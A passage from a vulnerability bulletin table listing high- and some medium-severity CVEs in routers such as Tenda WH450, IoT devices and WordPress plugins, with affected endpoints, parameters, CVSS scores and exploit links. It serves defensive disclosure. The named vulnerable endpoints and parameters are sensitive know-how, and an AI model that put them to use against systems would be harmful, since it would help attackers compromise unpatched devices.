| saiftheboss7--onlinemcqexam | A vulnerability was found in saiftheboss7 onlinemcqexam up to 0e56806132971e49721db3ef01868098c7b42ada. This vulnerability affects unknown code of the file /admin/quesadd.php. Performing manipulation of the argument ans1/ans2 results in sql injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. This product adopts a rolling release strategy to maintain continuous delivery The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 7.3 | CVE-2025-15140 | VDB-338518 | saiftheboss7 onlinemcqexam quesadd.php sql injection VDB-338518 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715219 | Github Online MCQ EXAM V1.0 SQL Injection Submit #715463 | github.com An online MCQ Exam system v1.0 SQL Injection (Duplicate) https://github.com/Anti1i/cve/issues/4 |
| Sigb--PMB | PMB 7.4.6 contains a SQL injection vulnerability in the storage parameter of the ajax.php endpoint that allows remote attackers to manipulate database queries. Attackers can exploit the unsanitized 'id' parameter by injecting conditional sleep statements to extract information or perform time-based blind SQL injection attacks. | 2025-12-23 | 8.2 | CVE-2023-53982 | ExploitDB-51197 Vendor Homepage Software Download Repository VulnCheck Advisory: PMB 7.4.6 SQL Injection Vulnerability via Unsanitized Storage Parameter |
| simstudioai--sim | A vulnerability was identified in simstudioai sim up to 0.5.27. This vulnerability affects unknown code of the file apps/sim/lib/auth/internal.ts of the component CRON Secret Handler. The manipulation of the argument INTERNAL_API_SECRET leads to improper authentication. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The identifier of the patch is e359dc2946b12ed5e45a0ec9c95ecf91bd18502a. Applying a patch is the recommended action to fix this issue. | 2025-12-26 | 7.3 | CVE-2025-15099 | VDB-338430 | simstudioai sim CRON Secret internal.ts improper authentication VDB-338430 | CTI Indicators (IOB, IOC, IOA) Submit #710255 | https://github.com/simstudioai https://github.com/simstudioai/sim ≤ v0.5.21 Authentication Bypass by Primary Weakness https://gist.github.com/H2u8s/c533741e1b36f6245d41cace89a7f4d2 https://github.com/simstudioai/sim/pull/2343 https://gist.github.com/H2u8s/c533741e1b36f6245d41cace89a7f4d2#-steps-to-reproduce https://github.com/simstudioai/sim/commit/e359dc2946b12ed5e45a0ec9c95ecf91bd18502a |
| Smartwares--Smartwares HOME easy | Smartwares HOME easy 1.0.9 contains an authentication bypass vulnerability that allows unauthenticated attackers to access administrative web pages by disabling JavaScript. Attackers can navigate to multiple administrative endpoints and to bypass client-side validation and access sensitive system information. | 2025-12-24 | 9.8 | CVE-2019-25235 | ExploitDB-47595 Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5540) |
| SOCA Technology Co., Ltd--SOCA Access Control System | SOCA Access Control System 180612 contains multiple SQL injection vulnerabilities that allow attackers to manipulate database queries through unvalidated POST parameters. Attackers can bypass authentication, retrieve password hashes, and gain administrative access with full system privileges by exploiting injection flaws in Login.php and Card_Edit_GetJson.php. | 2025-12-24 | 8.2 | CVE-2018-25128 | ExploitDB-46833 SOCA Technology Product Homepage Zero Science Lab Disclosure (ZSL-2019-5519) |
| SOCA Technology Co., Ltd--SOCA Access Control System | SOCA Access Control System 180612 contains multiple insecure direct object reference vulnerabilities that allow attackers to access sensitive user credentials. Attackers can retrieve authenticated and unauthenticated user password hashes and pins through unprotected endpoints like Get_Permissions_From_DB.php and Ac10_ReadSortCard. | 2025-12-24 | 7.5 | CVE-2018-25129 | ExploitDB-46832 SOCA Technology Product Homepage Zero Science Lab Disclosure (ZSL-2019-5517) |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains an insecure direct object reference vulnerability that allows attackers to bypass authorization and access hidden system resources. Attackers can exploit the vulnerability by manipulating user-supplied input to execute privileged functionalities without proper authentication. | 2025-12-22 | 9.8 | CVE-2023-53955 | ExploitDB-51169 SOUND4 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5723) VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x Authorization Bypass via Insecure Object References |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains an unauthenticated OS command injection vulnerability that allows remote attackers to execute arbitrary shell commands through the 'password' parameter. Attackers can exploit the login.php and index.php scripts by injecting shell commands via the 'password' POST parameter to execute commands with web server privileges. | 2025-12-22 | 9.8 | CVE-2023-53963 | ExploitDB-51173 SOUND4 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5738) VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x Unauthenticated Remote Command Injection |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco version 2.x contains an SQL injection vulnerability in the 'index.php' authentication mechanism that allows attackers to manipulate login credentials. Attackers can inject malicious SQL code through the 'password' POST parameter to bypass authentication and potentially gain unauthorized access to the system. | 2025-12-22 | 8.2 | CVE-2023-53960 | ExploitDB-51171 SOUND4 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5726) VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x SQL Injection via Authentication Bypass |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains an unauthenticated directory traversal vulnerability that allows remote attackers to write arbitrary files through the 'upgfile' parameter in upload.cgi. Attackers can exploit the vulnerability by sending crafted multipart form-data POST requests with directory traversal sequences to write files to unintended system locations. | 2025-12-22 | 7.5 | CVE-2023-53962 | ExploitDB-51172 SOUND4 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5730) VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x Unauthenticated Directory Traversal File Write |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains an unauthenticated vulnerability in the /usr/cgi-bin/restorefactory.cgi endpoint that allows remote attackers to reset device configuration. Attackers can send a POST request to the endpoint with specific data to trigger a factory reset and bypass authentication, gaining full system control. | 2025-12-22 | 7.5 | CVE-2023-53964 | ExploitDB-51174 SOUND4 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5742) VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x Unauthenticated Factory Reset Vulnerability |
| SOUND4 Ltd.--SOUND4 LinkAndShare Transmitter | SOUND4 LinkAndShare Transmitter 1.1.2 contains a format string vulnerability that allows attackers to trigger memory stack overflows through maliciously crafted environment variables. Attackers can manipulate the username environment variable with format string payloads to potentially execute arbitrary code and crash the application. | 2025-12-22 | 9.8 | CVE-2023-53966 | ExploitDB-51259 SOUND4 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5744) VulnCheck Advisory: SOUND4 LinkAndShare Transmitter 1.1.2 Format String Stack Buffer Overflow |
| SOUND4 Ltd.--SOUND4 Server Service | SOUND4 Server Service 4.1.102 contains an unquoted service path vulnerability that allows local non-privileged users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted binary path by inserting malicious code in the system root path that could execute with LocalSystem privileges during service startup. | 2025-12-22 | 8.4 | CVE-2023-53965 | ExploitDB-51167 SOUND4 Official Website Zero Science Lab Disclosure (ZSL-2022-5721) VulnCheck Advisory: SOUND4 Server Service 4.1.102 Local Privilege Escalation via Unquoted Service Path |
| Synaccess Networks Inc.--netBooter NP-02x/NP-08x | Synaccess netBooter NP-02x/NP-08x 6.8 contains an authentication bypass vulnerability in the webNewAcct.cgi script that allows unauthenticated attackers to create admin user accounts. Attackers can exploit the missing control check by sending crafted POST requests to create administrative accounts and gain unauthorized control over power supply management. | 2025-12-24 | 9.8 | CVE-2018-25134 | ExploitDB-45920 Vendor Product Homepage Zero Science Lab Disclosure (ZSL-2018-5500) |
| Tenda--CH22 | A weakness has been identified in Tenda CH22 1.0.0.1. Impacted is an unknown function of the file /public/. Executing manipulation can lead to path traversal. The attack can be launched remotely. The exploit has been made available to the public and could be exploited. | 2025-12-25 | 7.3 | CVE-2025-15076 | VDB-338333 | Tenda CH22 public path traversal VDB-338333 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721411 | Tenda CH22 V1.0.0.1 Authentication Bypass Issues https://github.com/master-abc/cve/blob/main/Tenda%20CH22%20V1.0.0.1%20Router%20Authentication%20Bypass%20Vulnerability%20in%20R7WebsSecurityHandler%20function.md https://www.tenda.com.cn/ |
| Tenda--WH450 | A weakness has been identified in Tenda WH450 1.0.0.18. Affected by this vulnerability is an unknown functionality of the file /goform/CheckTools of the component HTTP Request Handler. This manipulation of the argument ipaddress causes stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-12-22 | 9.8 | CVE-2025-15006 | VDB-337712 | Tenda WH450 HTTP Request CheckTools stack-based overflow VDB-337712 | CTI Indicators (IOB, IOC, IOA) Submit #719315 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/CheckTools/CheckTools.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/CheckTools/CheckTools.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A security vulnerability has been detected in Tenda WH450 1.0.0.18. Affected by this issue is some unknown functionality of the file /goform/L7Im of the component HTTP Request Handler. Such manipulation of the argument page leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. | 2025-12-22 | 9.8 | CVE-2025-15007 | VDB-337713 | Tenda WH450 HTTP Request L7Im stack-based overflow VDB-337713 | CTI Indicators (IOB, IOC, IOA) Submit #719316 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/L7Im/L7Im.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/L7Im/L7Im.md#poc https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability has been found in Tenda WH450 1.0.0.18. This issue affects some unknown processing of the file /goform/SafeUrlFilter. The manipulation of the argument page leads to stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. | 2025-12-22 | 9.8 | CVE-2025-15010 | VDB-337716 | Tenda WH450 SafeUrlFilter stack-based overflow VDB-337716 | CTI Indicators (IOB, IOC, IOA) Submit #719219 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/SafeUrlFilter/SafeUrlFilter.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/SafeUrlFilter/SafeUrlFilter.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was detected in Tenda WH450 1.0.0.18. Impacted is an unknown function of the file /goform/NatStaticSetting. The manipulation of the argument page results in stack-based buffer overflow. The attack may be performed from remote. The exploit is now public and may be used. | 2025-12-23 | 9.8 | CVE-2025-15044 | VDB-337849 | Tenda WH450 NatStaticSetting stack-based overflow VDB-337849 | CTI Indicators (IOB, IOC, IOA) Submit #720856 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/NatStaticSetting/NatStaticSetting.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/NatStaticSetting/NatStaticSetting.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A flaw has been found in Tenda WH450 1.0.0.18. The affected element is an unknown function of the file /goform/Natlimit of the component HTTP Request Handler. This manipulation of the argument page causes stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been published and may be used. | 2025-12-23 | 9.8 | CVE-2025-15045 | VDB-337850 | Tenda WH450 HTTP Request Natlimit stack-based overflow VDB-337850 | CTI Indicators (IOB, IOC, IOA) Submit #720882 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/Natlimit/Natlimit.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/Natlimit/Natlimit.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability has been found in Tenda WH450 1.0.0.18. The impacted element is an unknown function of the file /goform/PPTPClient of the component HTTP Request Handler. Such manipulation of the argument netmsk leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-12-23 | 9.8 | CVE-2025-15046 | VDB-337851 | Tenda WH450 HTTP Request PPTPClient stack-based overflow VDB-337851 | CTI Indicators (IOB, IOC, IOA) Submit #720883 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/PPTPClient/PPTPClient.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/PPTPClient/PPTPClient.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was found in Tenda WH450 1.0.0.18. This affects an unknown function of the file /goform/PPTPDClient of the component HTTP Request Handler. Performing manipulation of the argument Username results in stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made public and could be used. | 2025-12-23 | 9.8 | CVE-2025-15047 | VDB-337852 | Tenda WH450 HTTP Request PPTPDClient stack-based overflow VDB-337852 | CTI Indicators (IOB, IOC, IOA) Submit #720884 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/PPTPDClient/PPTPDClient.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/PPTPDClient/PPTPDClient.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was detected in Tenda WH450 1.0.0.18. This affects an unknown part of the file /goform/L7Port of the component HTTP Request Handler. Performing manipulation of the argument page results in stack-based buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used. | 2025-12-22 | 7.3 | CVE-2025-15008 | VDB-337714 | Tenda WH450 HTTP Request L7Port stack-based overflow VDB-337714 | CTI Indicators (IOB, IOC, IOA) Submit #719317 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/L7Prot/L7Prot.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/L7Prot/L7Prot.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was determined in Tenda WH450 1.0.0.18. This impacts an unknown function of the file /goform/CheckTools of the component HTTP Request Handler. Executing manipulation of the argument ipaddress can lead to command injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-23 | 7.3 | CVE-2025-15048 | VDB-337853 | Tenda WH450 HTTP Request CheckTools command injection VDB-337853 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #720885 | Tenda WH450 V1.0.0.18 Command Injection https://github.com/z472421519/BinaryAudit/blob/main/PoC/CMD/Tenda_WH450/CheckTools/CheckTools.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/CMD/Tenda_WH450/CheckTools/CheckTools.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability has been found in Tenda WH450 1.0.0.18. This impacts an unknown function of the file /goform/PPTPServer. Such manipulation of the argument ip1 leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-28 | 7.2 | CVE-2025-15160 | VDB-338535 | Tenda WH450 PPTPServer stack-based overflow VDB-338535 | CTI Indicators (IOB, IOC, IOA) Submit #720886 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/PPTPServer/PPTPServer.md https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was found in Tenda WH450 1.0.0.18. Affected is an unknown function of the file /goform/PPTPUserSetting. Performing manipulation of the argument delno results in stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2025-12-28 | 7.2 | CVE-2025-15161 | VDB-338536 | Tenda WH450 PPTPUserSetting stack-based overflow VDB-338536 | CTI Indicators (IOB, IOC, IOA) Submit #720887 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/PPTPUserSetting/PPTPUserSetting.md https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was determined in Tenda WH450 1.0.0.18. Affected by this vulnerability is an unknown functionality of the file /goform/RouteStatic. Executing manipulation of the argument page can lead to stack-based buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-28 | 7.2 | CVE-2025-15162 | VDB-338537 | Tenda WH450 RouteStatic stack-based overflow VDB-338537 | CTI Indicators (IOB, IOC, IOA) Submit #721210 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/RouteStatic/RouteStatic.md https://www.tenda.com.cn/ |
| The GNU Project | Free Software Foundation, Inc.--GNU Barcode | GNU Barcode 0.99 contains a buffer overflow vulnerability in its code 93 encoding process that allows attackers to trigger memory corruption. Attackers can exploit boundary errors during input file processing to potentially execute arbitrary code on the affected system. | 2025-12-24 | 9.8 | CVE-2018-25154 | ExploitDB-44797 GNU Barcode Official Product Page FSF Directory Entry for Barcode |
| The GNU Project | Free Software Foundation, Inc.--GNU Barcode | GNU Barcode 0.99 contains a memory leak vulnerability in the command line processing function within cmdline.c. Attackers can exploit this vulnerability by providing specially crafted input that causes unfreed memory allocations, potentially leading to denial of service conditions. | 2025-12-24 | 7.5 | CVE-2018-25153 | ExploitDB-44798 GNU Barcode Product Homepage FSF Directory Entry for Barcode |
| thedigicraft--Atom CMS | Atom CMS 2.0 contains an unauthenticated SQL injection vulnerability that allows remote attackers to manipulate database queries through unvalidated parameters. Attackers can inject malicious SQL code in the 'id' parameter of the admin index page to execute time-based blind SQL injection attacks. | 2025-12-22 | 8.2 | CVE-2023-53975 | ExploitDB-51086 Atom CMS GitHub Repository VulnCheck Advisory: Atom CMS 2.0 Unauthenticated SQL Injection via Admin Index Page |
| Thembay--Diza | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Thembay Diza allows PHP Local File Inclusion. This issue affects Diza: from n/a through 1.3.15. | 2025-12-23 | 7.5 | CVE-2025-68544 | https://vdp.patchstack.com/database/wordpress/theme/diza/vulnerability/wordpress-diza-theme-1-3-15-local-file-inclusion-vulnerability?_s_id=cve |
| Thembay--Nika | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Thembay Nika allows PHP Local File Inclusion. This issue affects Nika: from n/a through 1.2.14. | 2025-12-23 | 7.5 | CVE-2025-68546 | https://vdp.patchstack.com/database/wordpress/theme/nika/vulnerability/wordpress-nika-theme-1-2-14-local-file-inclusion-vulnerability?_s_id=cve |
| thibaud-rohmer--PhotoShow | PhotoShow 3.0 contains a remote code execution vulnerability that allows authenticated administrators to inject malicious commands through the exiftran path configuration. Attackers can exploit the ffmpeg configuration settings by base64 encoding a reverse shell command and executing it through a crafted video upload process. | 2025-12-22 | 7.2 | CVE-2023-53981 | ExploitDB-51236 Researcher Disclosure Software Repository VulnCheck Advisory: PhotoShow 3.0 Remote Code Execution via Exiftran Path Injection |
| TRENDnet--TEW-800MB | A security vulnerability has been detected in TRENDnet TEW-800MB 1.0.1.0. Affected is the function do_setWizard_asp of the file /goform/wizardset of the component Management Interface. The manipulation of the argument WizardConfigured leads to command injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 8.8 | CVE-2025-15136 | VDB-338514 | TRENDnet TEW-800MB Management wizardset do_setWizard_asp command injection VDB-338514 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #714042 | TRENDnet TEW-800mb v1.0.1.0 Command Injection https://pentagonal-time-3a7.notion.site/TRENDnet-TEW-800MB-2c7e5dd4c5a58067bc81e530bf3191c0 |
| TRENDnet--TEW-800MB | A vulnerability was detected in TRENDnet TEW-800MB 1.0.1.0. Affected by this vulnerability is the function sub_F934 of the file NTPSyncWithHost.cgi. The manipulation results in command injection. The attack may be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 8.8 | CVE-2025-15137 | VDB-338515 | TRENDnet TEW-800MB NTPSyncWithHost.cgi sub_F934 command injection VDB-338515 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #714241 | TRENDnet TEW-800mb v1.0.1.0 Command Injection https://pentagonal-time-3a7.notion.site/TRENDnet-TEW-800MB-NTP-2c7e5dd4c5a580f999adcaff2c31978b |
| tychesoftwares--Print Invoice & Delivery Notes for WooCommerce | The Print Invoice & Delivery Notes for WooCommerce plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 5.8.0 via the 'WooCommerce_Delivery_Notes::update' function. This is due to missing capability check in the 'WooCommerce_Delivery_Notes::update' function, PHP enabled in Dompdf, and missing escape in the 'template.php' file. This makes it possible for unauthenticated attackers to execute code on the server. | 2025-12-24 | 9.8 | CVE-2025-13773 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e52b34fe-2414-4d6f-bf43-9c5b65ebf769?source=cve https://plugins.trac.wordpress.org/changeset/3426119/woocommerce-delivery-notes https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/class-woocommerce-delivery-notes.php#L347 https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/class-woocommerce-delivery-notes.php#L473 https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/templates/pdf/simple/invoice/template.php#L36 https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/front/wcdn-front-function.php#L37 https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/front/vendor/dompdf/dompdf/src/PhpEvaluator.php#L52 |
| UTT-- 512W | A vulnerability has been found in UTT è¿›å– 512W up to 1.7.7-171114. This affects the function strcpy of the file /goform/APSecurity. The manipulation of the argument wepkey1 leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. | 2025-12-25 | 8.8 | CVE-2025-15089 | VDB-338418 | UTT è¿›å– 512W APSecurity strcpy buffer overflow VDB-338418 | CTI Indicators (IOB, IOC, IOA) Submit #708348 | UTT è¿›å– 512W v3v1.7.7-171114 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/14.md https://github.com/cymiao1978/cve/blob/main/new/14.md#poc |
| UTT-- 512W | A vulnerability was found in UTT è¿›å– 512W up to 1.7.7-171114. This vulnerability affects the function strcpy of the file /goform/formConfigNoticeConfig. The manipulation of the argument timestart results in buffer overflow. The attack may be performed from remote. The exploit has been made public and could be used. | 2025-12-25 | 8.8 | CVE-2025-15090 | VDB-338419 | UTT è¿›å– 512W formConfigNoticeConfig strcpy buffer overflow VDB-338419 | CTI Indicators (IOB, IOC, IOA) Submit #708349 | UTT è¿›å– 512W v3v1.7.7-171114 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/15.md https://github.com/cymiao1978/cve/blob/main/new/15.md#poc |
| UTT-- 512W | A vulnerability was determined in UTT è¿›å– 512W up to 1.7.7-171114. This issue affects the function strcpy of the file /goform/formPictureUrl. This manipulation of the argument importpictureurl causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-25 | 8.8 | CVE-2025-15091 | VDB-338420 | UTT è¿›å– 512W formPictureUrl strcpy buffer overflow VDB-338420 | CTI Indicators (IOB, IOC, IOA) Submit #708350 | UTT è¿›å– 512W v3v1.7.7-171114 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/16.md https://github.com/cymiao1978/cve/blob/main/new/16.md#poc |
| UTT-- 512W | A vulnerability was identified in UTT è¿›å– 512W up to 1.7.7-171114. Impacted is the function strcpy of the file /goform/ConfigExceptMSN. Such manipulation of the argument remark leads to buffer overflow. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2025-12-26 | 8.8 | CVE-2025-15092 | VDB-338421 | UTT è¿›å– 512W ConfigExceptMSN strcpy buffer overflow VDB-338421 | CTI Indicators (IOB, IOC, IOA) Submit #708351 | UTT è¿›å– 512W v3v1.7.7-171114 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/17.md https://github.com/cymiao1978/cve/blob/main/new/17.md#poc |
| Verisay Communication and Information Technology Industry and Trade Ltd. Co.--Aidango | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Verisay Communication and Information Technology Industry and Trade Ltd. Co. Aidango allows Cross-Site Scripting (XSS).This issue affects Aidango: before 2.144.4. | 2025-12-25 | 7.6 | CVE-2025-2307 | https://www.usom.gov.tr/bildirim/tr-25-0487 |
| Verisay Communication and Information Technology Industry and Trade Ltd. Co.--Titarus | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Verisay Communication and Information Technology Industry and Trade Ltd. Co. Titarus allows Cross-Site Scripting (XSS).This issue affects Titarus: before 2.144.4. | 2025-12-25 | 7.6 | CVE-2025-2405 | https://www.usom.gov.tr/bildirim/tr-25-0485 |
| Verisay Communication and Information Technology Industry and Trade Ltd. Co.--Trizbi | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Verisay Communication and Information Technology Industry and Trade Ltd. Co. Trizbi allows Cross-Site Scripting (XSS).This issue affects Trizbi: before 2.144.4. | 2025-12-25 | 7.6 | CVE-2025-2406 | https://www.usom.gov.tr/bildirim/tr-25-0486 |
| VillaTheme--WPBulky | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VillaTheme WPBulky allows Blind SQL Injection. This issue affects WPBulky: from n/a through 1.1.13. | 2025-12-23 | 7.6 | CVE-2025-68550 | https://vdp.patchstack.com/database/wordpress/plugin/wpbulky-wp-bulk-edit-post-types/vulnerability/wordpress-wpbulky-plugin-1-1-13-sql-injection-vulnerability?_s_id=cve |
| Wondershare--Wondershare MirrorGo | Wondershare MirrorGo 2.0.11.346 contains a local privilege escalation vulnerability due to incorrect file permissions on executable files. Unprivileged local users can replace the ElevationService.exe with a malicious file to execute arbitrary code with LocalSystem privileges. | 2025-12-22 | 8.4 | CVE-2022-50690 | ExploitDB-50787 Wondershare Official Homepage VulnCheck Advisory: Wondershare MirrorGo 2.0.11.346 Local Privilege Escalation via Insecure File Permissions |
| WPJobBoard--WPJobBoard | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPJobBoard allows Blind SQL Injection. This issue affects WPJobBoard: from n/a through 5.9.0. | 2025-12-24 | 8.6 | CVE-2023-36525 | https://vdp.patchstack.com/database/wordpress/plugin/wpjobboard/vulnerability/wordpress-wpjobboard-plugin-5-9-0-unauth-blind-sql-injection-sqli-vulnerability?_s_id=cve |
| Xspeeder--SXZOS | Xspeeder SXZOS through 2025-12-26 allows root remote code execution via base64-encoded Python code in the chkid parameter to vLogin.py. The title and oIP parameters are also used. | 2025-12-27 | 10 | CVE-2025-54322 | https://www.xspeeder.com https://pwn.ai/blog/cve-2025-54322-zeroday-unauthenticated-root-rce-affecting-70-000-hosts |
| Zillya--Zillya Total Security | Zillya Total Security 3.0.2367.0 contains a privilege escalation vulnerability that allows low-privileged users to copy files to unauthorized system locations using the quarantine module. Attackers can leverage symbolic link techniques to restore quarantined files to restricted directories, potentially enabling system-level access through techniques like DLL hijacking. | 2025-12-22 | 8.4 | CVE-2023-53973 | ExploitDB-51151 Zillya Official Homepage VulnCheck Advisory: Zillya Total Security 3.0.2367.0 Local Privilege Escalation via Quarantine Module |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| AVE S.p.A.--DOMINAplus | AVE DOMINAplus 1.10.x contains cross-site request forgery and cross-site scripting vulnerabilities that allow attackers to perform administrative actions without user consent. Attackers can craft malicious web pages to exploit login.php parameters and execute arbitrary scripts in user browser sessions. | 2025-12-24 | 5.3 | CVE-2019-25233 | ExploitDB-47821 AVE S.p.A. Official Website DOMINAplus Product Page Zero Science Lab Disclosure (ZSL-2019-5547) |
| Beward R&D Co., Ltd--BEWARD Intercom | Beward Intercom 2.3.1 contains a credentials disclosure vulnerability that allows local attackers to access plain-text authentication credentials stored in an unencrypted database file. Attackers can read the BEWARD.INTERCOM.FDB file to extract usernames and passwords, enabling unauthorized access to IP cameras and door stations. | 2025-12-24 | 6.2 | CVE-2018-25130 | ExploitDB-46267 Beward Product Homepage Zero Science Lab Disclosure (ZSL-2019-5505) |
| Beward R&D Co., Ltd--N100 H.264 VGA IP Camera | Beward N100 H.264 VGA IP Camera M2.1.6 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without proper request validation. Attackers can craft a malicious web page with a hidden form to add an admin user by tricking a logged-in user into submitting the form. | 2025-12-24 | 5.3 | CVE-2019-25247 | ExploitDB-46318 Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5510) |
| bnayawpguy--Resoto | Missing Authorization vulnerability in bnayawpguy Resoto allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Resoto: from n/a through 1.0.8. | 2025-12-24 | 4.3 | CVE-2023-28619 | https://vdp.patchstack.com/database/wordpress/theme/resoto/vulnerability/wordpress-resoto-theme-1-0-8-authenticated-arbitrary-plugin-activation?_s_id=cve |
